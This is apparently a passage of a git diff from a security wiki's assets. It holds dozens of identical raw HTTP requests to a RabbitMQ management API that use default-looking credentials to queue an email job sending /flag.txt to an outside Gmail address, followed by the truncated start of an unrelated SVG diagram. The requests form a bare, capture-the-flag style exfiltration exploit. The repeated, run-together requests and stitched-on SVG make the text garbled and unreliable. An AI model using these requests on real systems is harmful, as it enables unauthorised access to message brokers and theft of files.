+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}POST /api/exchanges/%2F/amq.default/publish HTTP/1.1
+Host: 172.32.56.72:15672
+Authorization: Basic dGVzdDp0ZXN0
+Accept: */*
+Content-Length: 264
+Content-Type: application/json;charset=UTF-8
+
+{"vhost":"/","name":"amq.default","properties":{"delivery_mode":1,"headers":{}},"routing_key":"email","delivery_mode":"1","payload":"{\"to\":\"carlospolop@gmail.com\",\"attachments\":[{\"path\":\"/flag.txt\"}]}","headers":{},"props":{},"payload_encoding":"string"}
+
diff --git a/.gitbook/assets/preflight.svg b/.gitbook/assets/preflight.svg
new file mode 100644
index 00000000..cb816648
--- /dev/null
+++ b/.gitbook/assets/preflight.svg
@@ -0,0 +1,57 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<svg width="1214px" height="941px" viewBox="0 0 1214 941" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">
+    <!-- Generator: Sketch 46.2 (44496) - http://www.bohemiancoding.com/sketch -->
+    <title>Diagram 3</title>
+    <desc>Created with Sketch.</desc>
+    <defs></defs>
+    <g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd">
+        <g id="Diagram-3">
+            <polygon id="Page-1" fill="#204056" points="0 941 1214 941 1214 0 0 0"></polygon>
+            <path d="M201.833333,890.939914 L201.833333,883.939914 L200.833333,883.939914 L200.833333,890.939914 L201.833333,890.939914 Z M201.833333,877.939914 L201.833333,870.939914 L200.833333,870.939914 L200.833333,877.939914 L201.833333,877.939914 Z M201.833333,864.939914 L201.833333,857.939914 L200.833333,857.939914 L200.833333,864.939914 L201.833333,864.939914 Z M201.833333,851.939914 L201.833333,844.939914 L200.833333,844.939914 L200.833333,851.939914 L201.833333,851.939914 Z M201.833333,838.939914 L201.833333,831.939914 L200.833333,831.939914 L200.833333,838.939914 L201.833333,838.939914 Z M201.833333,825.939914 L201.833333,818.939914 L200.833333,818.939914 L200.833333,825.939914 L201.833333,825.939914 Z M201.833333,812.939914 L201.833333,805.939914 L200.833333,805.939914 L200.833333,812.939914 L201.833333,812.939914 Z M201.833333,799.939914 L201.833333,792.939914 L200.833333,792.939914 L200.833333,799.939914 L201.833333,799.939914 Z M201.833333,786.939914 L201.833333,779.939914 L200.833333,779.939914 L200.833333,786.939914 L201.833333,786.939914 Z M201.833333,773.939914 L201.833333,766.939914 L200.833333,766.939914 L200.833333,773.939914 L201.833333,773.939914 Z M201.833333,760.939914 L201.833333,753.939914 L200.833333,753.939914 L200.833333,760.939914 L201.833333,760.939914 Z M201.833333,747.939914 L201.833333,740.939914 L200.833333,740.939914 L200.833333,747.939914 L201.833333,747.939914 Z M201.833333,734.939914 L201.833333,727.939914 L200.833333,727.939914 L200.833333,734.939914 L201.833333,734.939914 Z M201.833333,721.939914 L201.833333,714.939914 L200.833333,714.939914 L200.833333,721.939914 L201.833333,721.939914 Z M201.833333,708.939914 L201.833333,701.939914 L200.833333,701.939914 L200.833333,708.939914 L201.833333,708.939914 Z M201.833333,695.939914 L201.833333,688.939914 L200.833333,688.939914 L200.833333,695.939914 L201.833333,695.939914 Z M201.833333,682.939914 L201.833333,675.939914 L200.833333,675.939914 L200.833333,682.939914 L201.833333,682.939914 Z M201.833333,669.939914 L201.833333,662.939914 L200.833333,662.939914 L200.833333,669.939914 L201.833333,669.939914 Z M201.833333,656.939914 L201.833333,649.939914 L200.833333,649.939914 L200.833333,656.939914 L201.833333,656.939914 Z M201.833333,643.939914 L201.833333,636.939914 L200.833333,636.939914 L200.833333,643.939914 L201.833333,643.939914 Z M201.833333,630.939914 L201.833333,623.939914 L200.833333,623.939914 L200.833333,630.939914 L201.833333,630.939914 Z M201.833333,617.939914 L201.833333,610.939914 L200.833333,610.939914 L200.833333,617.939914 L201.833333,617.939914 Z M201.833333,604.939914 L201.833333,597.939914 L200.833333,597.939914 L200.833333,604.939914 L201.833333,604.939914 Z M201.833333,591.939914 L201.833333,584.939914 L200.833333,584.939914 L200.833333,591.939914 L201.833333,591.939914 Z M201.833333,578.939914 L201.833333,571.939914 L200.833333,571.939914 L200.833333,578.939914 L201.833333,578.939914 Z M201.833333,565.939914 L201.833333,558.939914 L200.833333,558.939914 L200.833333,565.939914 L201.833333,565.939914 Z M201.833333,552.939914 L201.833333,545.939914 L200.833333,545.939914 L200.833333,552.939914 L201.833333,552.939914 Z M201.833333,539.939914 L201.833333,532.939914 L200.833333,532.939914 L200.833333,539.939914 L201.833333,539.939914 Z M201.833333,526.939914 L201.833333,519.939914 L200.833333,519.939914 L200.833333,526.939914 L201.833333,526.939914 Z M201.833333,513.939914 L201.833333,506.939914 L200.833333,506.939914 L200.833333,513.939914 L201.833333,513.939914 Z M201.833333,500.939914 L201.833333,493.939914 L200.833333,493.939914 L200.833333,500.939914 L201.833333,500.939914 Z M201.833333,487.939914 L201.833333,480.939914 L200.833333,480.939914 L200.833333,487.939914 L201.833333,487.939914 Z M201.833333,474.939914 L201.833333,467.939914 L200.833333,467.939914 L200.833333,474.939914 L201.833333,474.939914 Z M201.833333,461.939914 L201.833333,454.939914 L200.833333,454.939914 L200.833333,461.939914 L201.833333,461.939914 Z M201.833333,448.939914 L201.833333,441.939914 L200.833333,441.939914 L200.833333,448.939914 L201.833333,448.939914 Z M201.833333,435.939914 L201.833333,428.939914 L200.833333,428.939914 L200.833333,435.939914 L201.833333,435.939914 Z M201.833333,422.939914 L201.833333,415.939914 L200.833333,415.939914 L200.833333,422.939914 L201.833333,422.939914 Z M201.833333,409.939914 L201.833333,402.939914 L200.833333,402.939914 L200.833333,409.939914 L201.833333,409.939914 Z M201.833333,396.939914 L201.833333,389.939914 L200.833333,389.939914 L200.833333,396.939914 L201.833333,396.939914 Z M201.833333,383.939914 L201.833333,376.939914 L200.833333,376.939914 L200.833333,383.939914 L201.833333,383.939914 Z M201.833333,370.939914 L201.833333,363.939914 L200.833333,363.939914 L200.833333,370.939914 L201.833333,370.939914 Z M201.833333,357.939914 L201.833333,350.939914 L200.833333,350.939914 L200.833333,357.939914 L201.833333,357.939914 Z M201.833333,344.939914 L201.833333,337.939914 L200.833333,337.939914 L200.833333,344.939914 L201.833333,344.939914 Z M201.833333,331.939914 L201.833333,324.939914 L200.833333,324.939914 L200.833333,331.939914 L201.833333,331.939914 Z M201.833333,318.939914 L201.833333,311.939914 